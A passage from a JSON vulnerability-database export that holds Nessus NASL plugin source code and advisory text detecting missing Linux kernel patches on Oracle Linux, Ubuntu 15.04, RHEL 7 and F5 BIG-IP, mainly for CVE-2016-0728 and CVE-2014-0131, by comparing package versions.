'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-118.2.5.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-118.2.5.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-3.8.13-118.2.5.el6uek / dtrace-modules-3.8.13-118.2.5.el7uek / kernel-uek / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:36", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 15.04 : linux vulnerability (USN-2871-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2871-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88012", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2871-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88012);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2871-1\");\n\n script_name(english:\"Ubuntu 15.04 : linux vulnerability (USN-2871-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2871-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2871-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.04\", pkgname:\"linux-image-3.19.0-47-generic\", pkgver:\"3.19.0-47.53\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"linux-image-3.19.0-47-generic-lpae\", pkgver:\"3.19.0-47.53\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"linux-image-3.19.0-47-lowlatency\", pkgver:\"3.19.0-47.53\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:42", "description": "Updated kernel-rt packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for reporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-02-04T00:00:00", "type": "nessus", "title": "RHEL 7 : kernel-rt (RHSA-2016:0065)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2016-0065.NASL", "href": "https://www.tenable.com/plugins/nessus/88574", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0065. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88574);\n script_version(\"2.13\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0065\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2016:0065)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel-rt packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0728\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:0065\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0065\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-327.4.5.rt56.206.el7_2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:16:53", "description": "Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (SOL15699)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0131"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15699.NASL", "href": "https://www.tenable.com/plugins/nessus/86006", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15699.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86006);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2014-0131\");\n script_bugtraq_id(66101);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (SOL15699)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in the skb_segment function in\nnet/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers\nto obtain sensitive information from kernel memory by leveraging the\nabsence of a certain orphaning operation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15699\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15699.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15699\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.0.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.1.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.1.0-11.3.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.1.0-11.3.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_note(port:0, extra:bigip_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2021-09-02T22:53:23", "description": "A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-06T13:47:55", "type": "redhatcve", "title": "CVE-2016-10318", "bulletinFamily": "info", 